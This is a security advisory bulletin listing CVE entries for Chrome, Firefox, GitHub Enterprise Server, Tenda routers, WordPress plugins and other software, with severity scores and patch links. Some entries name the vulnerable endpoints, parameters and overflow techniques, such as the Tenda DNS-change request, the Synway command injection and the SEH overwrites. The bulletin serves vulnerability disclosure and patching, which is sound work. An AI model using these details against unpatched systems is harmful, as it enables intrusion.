| Google--Chrome | Insufficient validation of untrusted input in TabGroups in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8003 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495985532 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8004 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496189510 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 148.0.7778.96 allowed an attacker on the local network segment to bypass same origin policy via malicious network traffic. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8005 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496298665 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8006 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496373088 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8007 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496399759 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8008 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496426191 |
| Google--Chrome | Inappropriate implementation in Cast in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8009 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496555077 |
| Google--Chrome | Insufficient validation of untrusted input in SiteIsolation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8010 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496624084 |
| Google--Chrome | Insufficient policy enforcement in Search in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8011 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496626029 |
| Google--Chrome | Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8012 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496628298 |
| Google--Chrome | Insufficient validation of untrusted input in FedCM in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8013 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497427430 |
| Google--Chrome | Inappropriate implementation in Preload in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8014 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497490364 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8015 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497548558 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8016 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497695401 |
| Google--Chrome | Side-channel information leakage in Media in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8017 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497722578 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to potentially perform a sandbox escape via malicious network traffic. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8018 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498292657 |
| Google--Chrome | Insufficient policy enforcement in WebApp in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8019 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498353173 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8020 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498382925 |
| Google--Chrome | Script injection in UI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8021 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498417031 |
| Google--Chrome | Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted MHTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8022 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499194407 |
| GitHub--Enterprise Server | A server-side request forgery (SSRF) vulnerability was identified in the GitHub Enterprise Server notebook viewer that allowed an attacker to access internal services by exploiting URL parser confusion between the validation layer and the HTTP request library. The hostname validation used a different URL parser than the request library, enabling a crafted URL to pass validation while directing the request to an unintended host. Exploitation required network access to the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.16.18, 3.17.15, 3.18.9, 3.19.6, and 3.20.2. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-07 | not yet calculated | CVE-2026-8034 | https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.18 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.15 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.9 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.6 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.2 |
| Acer--PredatorSense V3 | PredatorSense version 3.00.3136 to 3.00.3196 contain Local Privilege Escalation (LPE) vulnerability.The program exposes a Windows Named Pipe that uses a custom protocol to invoke internal functions. However, this Named Pipe is misconfigured, allowing any authenticated local user to execute arbitrary code with NT AUTHORITY\SYSTEM privileges and to delete arbitrary files with SYSTEM privileges. By leveraging this, an attacker can execute arbitrary code on the target system with elevated privileges. | 2026-05-08 | not yet calculated | CVE-2026-8069 | https://community.acer.com/en/kb/articles/19652 |
| CashDro--CashDro 3 Administration Panel | Weak credentials in the CashDro 3 web administration panel, version 24.01.00.26, where the platform allows the use of numeric PINs for user authentication. The system supports the use of PIN-based credentials, maintaining compatibility with POS software integrations deployed since 2012. This could allow an attacker to easily perform a brute-force attack against a user and gain access by trying different PINs without the account being locked. Successful exploitation of this vulnerability could result in unauthorized access to confidential configuration settings, compromising the security of the system. | 2026-05-08 | not yet calculated | CVE-2026-8076 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cashdro-3 https://labs.itresit.es/2026/05/07/cashdro-vulnerabilities-from-pentest-to-stealing-money/ |
| CashDro--CashDro 3 Administration Panel | Lack of proper authorization implementation in the CashDro 3 web administration panel, version 24.01.00.26. The backend lacks authorization controls, leaving security entirely to the frontend. By modifying the binary string in the 'Permissions' field of the JSON response, an attacker could escalate privileges and gain full administrative access. This vulnerability allows all restrictions to be bypassed and completely compromises system management. | 2026-05-08 | not yet calculated | CVE-2026-8077 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cashdro-3 https://labs.itresit.es/2026/05/07/cashdro-vulnerabilities-from-pentest-to-stealing-money/ |
| misp--misp | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in misp allows Stored XSS. This issue affects MISP before 2.5.37. A stored cross-site scripting vulnerability exists in the template element attribute handling logic. The application accepted arbitrary values for the TemplateElementAttribute type and category fields without validating them against the known MISP attribute type and category definitions. An attacker with permission to create or modify template element attributes could store a crafted type value. This affects the old templating (not more accessible in 2.5.37) engine from MISP which will be removed in 2.5.38 | 2026-05-07 | not yet calculated | CVE-2026-8080 | https://github.com/MISP/MISP/commit/62824e5ca0056d01b195f70466ea0d382cca06d0 |
| Mozilla--Firefox | Use-after-free in the DOM: Networking component. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, Firefox ESR 115.35.2, Thunderbird 150.0.2, and Thunderbird 140.10.2. | 2026-05-07 | not yet calculated | CVE-2026-8090 | https://bugzilla.mozilla.org/show_bug.cgi?id=2034352 https://www.mozilla.org/security/advisories/mfsa2026-40/ https://www.mozilla.org/security/advisories/mfsa2026-41/ https://www.mozilla.org/security/advisories/mfsa2026-42/ https://www.mozilla.org/security/advisories/mfsa2026-43/ https://www.mozilla.org/security/advisories/mfsa2026-44/ |
| Mozilla--Firefox | Incorrect boundary conditions in the Audio/Video: Playback component. This vulnerability was fixed in Firefox 150, Thunderbird 150, Firefox ESR 140.10.1, Thunderbird 140.10.1, and Firefox ESR 115.35.2. | 2026-05-07 | not yet calculated | CVE-2026-8091 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029301 https://www.mozilla.org/security/advisories/mfsa2026-30/ https://www.mozilla.org/security/advisories/mfsa2026-33/ https://www.mozilla.org/security/advisories/mfsa2026-36/ https://www.mozilla.org/security/advisories/mfsa2026-39/ https://www.mozilla.org/security/advisories/mfsa2026-42/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird ESR 140.10.1 and Thunderbird 150.0.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150.0.2, Firefox ESR 140.10.2, Firefox ESR 115.35.2, Thunderbird 150.0.2, and Thunderbird 140.10.2. | 2026-05-07 | not yet calculated | CVE-2026-8092 | Memory safety bugs fixed in Thunderbird ESR 140.10.2 and Thunderbird 150.0.2 https://www.mozilla.org/security/advisories/mfsa2026-40/ https://www.mozilla.org/security/advisories/mfsa2026-41/ https://www.mozilla.org/security/advisories/mfsa2026-42/ https://www.mozilla.org/security/advisories/mfsa2026-43/ https://www.mozilla.org/security/advisories/mfsa2026-44/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird 150.0.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150.0.2 and Thunderbird 150.0.2. | 2026-05-07 | not yet calculated | CVE-2026-8093 | Memory safety bugs fixed in Thunderbird 150.0.2 https://www.mozilla.org/security/advisories/mfsa2026-40/ https://www.mozilla.org/security/advisories/mfsa2026-43/ |
| Mozilla--Firefox | Other issue in the WebRTC component. This vulnerability was fixed in Firefox ESR 140.10.2 and Thunderbird 140.10.2. | 2026-05-07 | not yet calculated | CVE-2026-8094 | https://bugzilla.mozilla.org/show_bug.cgi?id=2035939 https://www.mozilla.org/security/advisories/mfsa2026-41/ https://www.mozilla.org/security/advisories/mfsa2026-44/ |
| GitHub--Enterprise Server | A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirect_to query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an attacker to inject a form element that could capture administrator credentials. Exploitation required an administrator to click a crafted link and enter their credentials. This vulnerability affected GitHub Enterprise Server versions 3.19.1 through 3.19.5 and 3.20.0 through 3.20.1, and was fixed in versions 3.19.6 and 3.20.2. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-07 | not yet calculated | CVE-2026-8106 | https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.6 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.2 |
| CERT/CC--VINCE | VINCE versions 3.0.38 and earlier do not properly verify the From address authenticity due to encoding confusion and use the from address for automated actions such as Ticket creation or Ticket updates. | 2026-05-07 | not yet calculated | CVE-2026-8142 | https://kb.cert.org/vince https://github.com/CERTCC/VINCE |
| NAVER--NAVER MYBOX Explorer | NAVER MYBOX Explorer for Windows before 3.0.11.160 allows a local attacker to escalate privileges to NT AUTHORITY\SYSTEM via registry manipulation due to improper privilege checks. | 2026-05-08 | not yet calculated | CVE-2026-8148 | https://cve.naver.com/detail/cve-2026-8148.html |
| Legion of the Bouncy Castle Inc.--BC-FJA | A vulnerability in Legion of the Bouncy Castle Inc. BC-FJA BC-FIPS on Linux, X86_64, AVX, AVX-512f. This vulnerability is associated with program files gcm128w, gcm512w. This issue affects BC-FJA: from 2.1.0 through 2.1.2. | 2026-05-08 | not yet calculated | CVE-2026-8149 | https://do-not-publish.bouncycastle.org/do_not_publish |
| SHLOMIF--XML::LibXML | XML::LibXML versions through 2.0210 for Perl read out-of-bounds heap memory when parsing XML node names containing truncated UTF-8 byte sequences. A node name ending in the middle of a multi byte UTF-8 sequence causes the parser to read past the end of the input string into adjacent heap memory. Any Perl process that passes attacker controlled strings to XML::LibXML's DOM node-name methods can reach this path on the default API. The likely consequence is a crash, causing denial of service. | 2026-05-10 | not yet calculated | CVE-2026-8177 | https://github.com/cpan-authors/XML-LibXML/issues/146 https://github.com/cpan-authors/XML-LibXML/pull/149 https://github.com/cpan-authors/XML-LibXML/commit/15652bd905a6c9dda59a81b14d4766adbbae2ea8.patch |
| gibbonedu--gibbon | Gibbon versions before v30.0.01 are affected by an authenticated SQL Injection vulnerability by abusing the Tracking/graphing https://github.com/GibbonEdu/core/blob/c431e25fdc874adece5d2dc7e408e9aa2d1abadb/modules/Tracking/graphing.php#L145 feature. Successful exploitation requires Teacher or higher privileges. Exploitation could result in unintended read/write activities to the underlying database. | 2026-05-09 | not yet calculated | CVE-2026-8207 | https://projectblack.io/blog/gibbon-v30-authenticated-sql-injection-and-rce/#sql-injectiongetting-warmed-up https://github.com/GibbonEdu/core/releases/tag/v30.0.01 |
| gibbonedu--gibbon | Gibbon versions before v30.0.01 are affected by a local file inclusion vulnerability resulting in RCE by changing the report archive directory and forcing interpretation of a user provided .zip as PHP. Successful exploitation requires Teacher or higher privileges. Exploitation could result in compromise of the underlying web server. | 2026-05-09 | not yet calculated | CVE-2026-8208 | https://projectblack.io/blog/gibbon-v30-authenticated-sql-injection-and-rce/#local-file-inclusionthe-next-shiny-new-thing https://github.com/GibbonEdu/core/releases/tag/v30.0.01 |
| gibbonedu--gibbon | Gibbon versions before v30.0.01 are affected by a path traversal vulnerability resulting in DOS by attempting extraction of web application PHP files, failed .zip extraction results in deletion of the file and a DOS condition. Successful exploitation requires Teacher or higher privileges. Exploitation could result in loss of availability of the web application. | 2026-05-09 | not yet calculated | CVE-2026-8209 | https://github.com/GibbonEdu/core/releases/tag/v30.0.01 https://projectblack.io/blog/gibbon-v30-authenticated-sql-injection-and-rce/#denial-of-service-via-path-traversal |
Vulnerability Summary for the Week of April 27, 2026
Posted on Wednesday May 06, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| n/a-- OVMS3 3.3.005 | Buffer overflow vulnerability in Open Vehicle Monitoring System 3 (OVMS3) 3.3.005. In canformat_gvret.cpp, the length field in GVRET binary data is not properly validated, allowing remote attackers to cause a denial of service or possibly execute arbitrary code via crafted GVRET frames. | 2026-05-01 | 10 | CVE-2026-37541 | https://github.com/openvehicles/Open-Vehicle-Monitoring-System-3 https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| tendacn[.]com-- W308R | Tenda W308R v2 V5.07.48 contains a cookie session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient session validation. Attackers can send GET requests to the goform/AdvSetDns endpoint with a crafted admin language cookie to change DNS servers and redirect user traffic to malicious sites. | 2026-04-29 | 9.8 | CVE-2018-25316 | ExploitDB-44373 VulnCheck Advisory: Tenda W308R v2 V5.07.48 Cookie Session Weakness DNS Change |
| tendacn[.]com--W3002R | Tenda W3002R/A302/W309R wireless routers version V5.07.64_en contain a cookie session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient session validation. Attackers can send GET requests to the /goform/AdvSetDns endpoint with a crafted admin language cookie to change primary and secondary DNS servers, redirecting user traffic to malicious DNS servers. | 2026-04-29 | 9.8 | CVE-2018-25317 | ExploitDB-44380 VulnCheck Advisory: Tenda W3002R/A302/W309R V5.07.64_en Cookie Session Weakness DNS Change |
| tendacn[.]com--FH303/A300 | Tenda FH303/A300 firmware V5.07.68_EN contains a session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient cookie validation. Attackers can send GET requests to the /goform/AdvSetDns endpoint with a crafted admin cookie to change DNS servers and redirect user traffic to malicious sites. | 2026-04-29 | 9.8 | CVE-2018-25318 | ExploitDB-44381 VulnCheck Advisory: Tenda FH303/A300 V5.07.68_EN Cookie Session Weakness DNS Change |
| Weaver Network Co., Ltd.--E-office | Weaver (Fanwei) E-office versions prior to 10.0_20221201 contain an unauthenticated arbitrary file upload vulnerability in the OfficeServer.php endpoint that allows remote attackers to upload malicious files by sending multipart POST requests with arbitrary filenames and disguised content types. Attackers can upload PHP webshells to the Document directory and execute them via HTTP GET requests to achieve remote code execution as the web server user. Exploitation evidence was first observed by the Shadowserver Foundation on 2022-10-10 (UTC). | 2026-04-30 | 9.8 | CVE-2022-50993 | https://service.e-office.cn/knowledge/detail/5 https://cn-sec.com/archives/1453025.html https://bbs.chaitin.cn/topic/37 https://www.vulncheck.com/advisories/weaver-e-office-10-0-20221201-unauthenticated-arbitrary-file-read-via-xmlrpcservlet |
| synway[.]net-- SMG Gateway Management | Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius.php where the radius_address POST parameter is split and interpolated directly into a sed command without sanitization. An unauthenticated remote attacker can inject arbitrary shell commands by submitting a POST request with crafted radius_address, radius_address2, shared_secret2, source_ip, timeout, or retry parameters along with save=1 and enable_radius=1 to achieve remote code execution. Exploitation evidence was first observed by the Shadowserver Foundation on 2025-07-11 (UTC). | 2026-04-30 | 9.8 | CVE-2025-71284 | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/synway/synwaysmg-radius-rce.yaml https://mrxn.net/jswz/synway-9-2radius-rce.html https://mp.weixin.qq.com/s/PyepoFSuQ63E3RnpQa9nsA https://www.synway.net/ https://www.vulncheck.com/advisories/synway-smg-gateway-management-software-os-command-injection-via-radius-address |
| Directorist Booking--Directorist Booking | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Directorist Booking allows SQL Injection.This issue affects Directorist Booking: from n/a before 3.0.2. | 2026-04-27 | 9.3 | CVE-2026-22336 | https://patchstack.com/database/wordpress/plugin/directorist-booking/vulnerability/wordpress-directorist-booking-plugin-2-4-1-sql-injection-vulnerability?_s_id=cve |
| Directorist--Directorist Social Login | Incorrect Privilege Assignment vulnerability in Directorist Directorist Social Login allows Privilege Escalation.This issue affects Directorist Social Login: from n/a before 2.1.4. | 2026-04-27 | 9.8 | CVE-2026-22337 | https://patchstack.com/database/wordpress/plugin/directorist-social-login/vulnerability/wordpress-directorist-social-login-plugin-2-1-1-privilege-escalation-vulnerability?_s_id=cve |
| Milesight--MS-Cxx63-PD | Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys. | 2026-04-27 | 9.8 | CVE-2026-32644 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-113-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-03.json https://www.milesight.com/support/download/firmware |
| n/a--Automotive Grade Linux (AGL) | AGL app-framework-main thru 17.1.12 contains a Zip Slip path traversal vulnerability (CWE-22) combined with a TOCTOU race condition (CWE-367) in the widget installation flow. The is_valid_filename function in wgtpkg-zip.c validates ZIP entry names but does not check for dot notation directory traversal sequences it only blocks absolute paths. The zread extraction function uses openat(workdirfd, filename, O_CREAT) which resolves dot notation values relative to the work directory, allowing files to be written anywhere on the filesystem. Critically, in function install_widget in file wgtpkg-install.c, extraction via zread occurs BEFORE signature verification via check_all_signatures. Even if signature verification fails, the error cleanup (remove_workdir) only deletes the temporary work directory files written outside via path traversal persist permanently. | 2026-05-01 | 9.8 | CVE-2026-37531 | https://gerrit.automotivelinux.org/gerrit/src/app-framework-main https://gist.github.com/sgInnora/8526eedcfd826d05ef1fc45d8f405643 |
| n/a-- cannelloni v2.0.0 | Buffer overflow vulnerability in cannelloni v2.0.0 in CAN frame parsing in parser.cpp in function parseCANFrame, and decoder.cpp in function decodeFrame allowing remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via crafted CAN FD frames. | 2026-05-01 | 9.8 | CVE-2026-37539 | https://github.com/mguentner/cannelloni https://gist.github.com/sgInnora/f4ac66faeefe07a653ceeb3f58cdc381 |
| Carlson Software--VASCO-B GNSS Receiver | The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials. | 2026-04-28 | 9.4 | CVE-2026-3893 | https://www.carlsonsw.com/support-and-training/ https://www.cve.org/CVERecord?id=CVE-2026-3893 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-02.json |
| Mersenne--Prime95 | Prime95 29.4b8 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by exploiting structured exception handling (SEH) mechanisms. Attackers can inject malicious payload through the optional proxy hostname field in the PrimeNet connection settings to trigger the overflow and execute system commands. | 2026-04-29 | 8.4 | CVE-2018-25299 | ExploitDB-44649 Official Product Homepage Product Reference VulnCheck Advisory: Prime95 29.4b8 Local Buffer Overflow via SEH |
| xataboost--XATABoost CMS | XATABoost CMS 1.0.0 contains a union-based SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the id parameter. Attackers can send GET requests to news.php with malicious id values to extract sensitive database information. | 2026-04-29 | 8.2 | CVE-2018-25300 | ExploitDB-44622 Official Product Homepage VulnCheck Advisory: XATABoost CMS 1.0.0 SQL Injection via news.php |
| Easy MPEG--Easy MPEG to DVD Burner | Easy MPEG to DVD Burner 1.7.11 contains a structured exception handling (SEH) local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious username string. Attackers can craft a payload containing junk data, SEH chain pointers, and shellcode that overwrites the SEH handler to redirect execution and run arbitrary commands like opening calc.exe. | 2026-04-29 | 8.4 | CVE-2018-25301 | ExploitDB-44565 Product Reference VulnCheck Advisory: Easy MPEG to DVD Burner 1.7.11 SEH Local Buffer Overflow |
| Alloksoft--Allok Video to DVD Burner | Allok Video to DVD Burner 2.6.1217 contains a stack-based buffer overflow vulnerability in the License Name field that allows local attackers to execute arbitrary code by triggering a structured exception handler (SEH) overwrite. Attackers can craft a malicious input string with 780 bytes of junk data followed by SEH chain pointers and shellcode, then paste it into the License Name field during registration to achieve code execution. | 2026-04-29 | 8.4 | CVE-2018-25303 | ExploitDB-44518 Official Product Homepage VulnCheck Advisory: Allok Video to DVD Burner 2.6.1217 Buffer Overflow SEH |
| Filehippo--Free Download Manager | Free Download Manager 2.0 Built 417 contains a local buffer overflow vulnerability in the URL import functionality that allows attackers to trigger a structured exception handler (SEH) chain exploitation. Attackers can craft a malicious URL file that, when imported through the File > Import > Import lists of downloads menu, causes a buffer overflow in the Location header response that overwrites the SEH chain and executes arbitrary code. | 2026-04-29 | 8.4 | CVE-2018-25304 | ExploitDB-44499 Product Reference VulnCheck Advisory: Free Download Manager 2.0 Built 417 Local Buffer Overflow SEH |
| Sysgauge--SysGauge Pro | SysGauge Pro 4.6.12 contains a local buffer overflow vulnerability in the Register function that allows local attackers to overwrite the structured exception handler by supplying a crafted unlock key. Attackers can inject shellcode through the Unlock Key field during registration to execute arbitrary code with application privileges. | 2026-04-29 | 8.4 | CVE-2018-25307 | ExploitDB-44455 VulnCheck Advisory: SysGauge Pro 4.6.12 Local Buffer Overflow SEH |
| donmik--Buddypress Xprofile Custom Fields Type | BuddyPress Xprofile Custom Fields Type 2.6.3 contains a remote code execution vulnerability that allows authenticated users to delete arbitrary files by manipulating unescaped POST parameters. Attackers can modify the field_hiddenfile and field_deleteimg parameters during profile editing to unlink files from the server. | 2026-04-29 | 8.8 | CVE-2018-25308 | ExploitDB-44432 Official Product Homepage VulnCheck Advisory: BuddyPress Xprofile Custom Fields Type 2.6.3 Remote Code Execution |
| Alloksoft--WMV to AVI MPEG DVD WMV Converter | Allok soft WMV to AVI MPEG DVD WMV Converter 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized string in the License Name field. Attackers can craft a malicious input containing shellcode with structured exception handler (SEH) overwrite to bypass protections and execute code with application privileges. | 2026-04-29 | 8.4 | CVE-2018-25314 | ExploitDB-44365 Official Product Homepage Product Reference VulnCheck Advisory: Allok soft WMV to AVI MPEG DVD WMV Converter 4.6.1217 Buffer Overflow |
| Alloksoft--Video Joiner | Alloksoft Video joiner 4.6.1217 contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Attackers can craft a payload with structured exception handler (SEH) overwrite and shellcode to achieve code execution when the application processes the license registration input. | 2026-04-29 | 8.4 | CVE-2018-25315 | ExploitDB-44364 Official Product Homepage Product Reference VulnCheck Advisory: Alloksoft Video joiner 4.6.1217 Buffer Overflow via License Name |
| marketingfire--Widget Options Advanced Conditional Visibility for Gutenberg Blocks & Classic Widgets | The Widget Options - Advanced Conditional Visibility for Gutenberg Blocks & Classic Widgets plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.2.2 via the Display Logic feature. This is due to the plugin using eval() on user-supplied Display Logic expressions with an insufficient blocklist/allowlist that can be bypassed using array_map with string concatenation, combined with a lack of authorization enforcement on the extended_widget_opts_block attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. The vulnerability was partially patched in version 4.2.0. | 2026-05-02 | 8.8 | CVE-2026-2052 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68023557-fc92-4cf6-96b4-405ff5a5fd5a?source=cve https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/widgets/gutenberg/gutenberg-toolbar.php#L843 https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/extras.php#L495 https://plugins.trac.wordpress.org/browser/widget-options/trunk/includes/extras.php#L534 https://plugins.trac.wordpress.org/changeset/3481338/ https://plugins.trac.wordpress.org/changeset/3514411/ |
| Milesight--MS-Cxx63-PD | An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras. | 2026-04-27 | 8.8 | CVE-2026-20766 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-113-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-113-03.json https://www.milesight.com/support/download/firmware |
| wclovers--WCFM Frontend Manager for WooCommerce | The WCFM - Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.7.25 via the 'wcfm_delete_wcfm_customer' due to missing validation on the 'customerid' user controlled key. This makes it possible for authenticated attackers, with Vendor-level access and above, to delete arbitrary users, including Administrators. | 2026-05-02 | 8.1 | CVE-2026-2554 | https://www.wordfence.com/threat-intel/vulnerabilities/id/21e397a4-0b32-4b13-a46b-c465acea0796?source=cve https://plugins.trac.wordpress.org/browser/wc-frontend-manager/tags/6.7.24/core/class-wcfm-customer.php#L386 https://plugins.trac.wordpress.org/changeset/3483695/ |
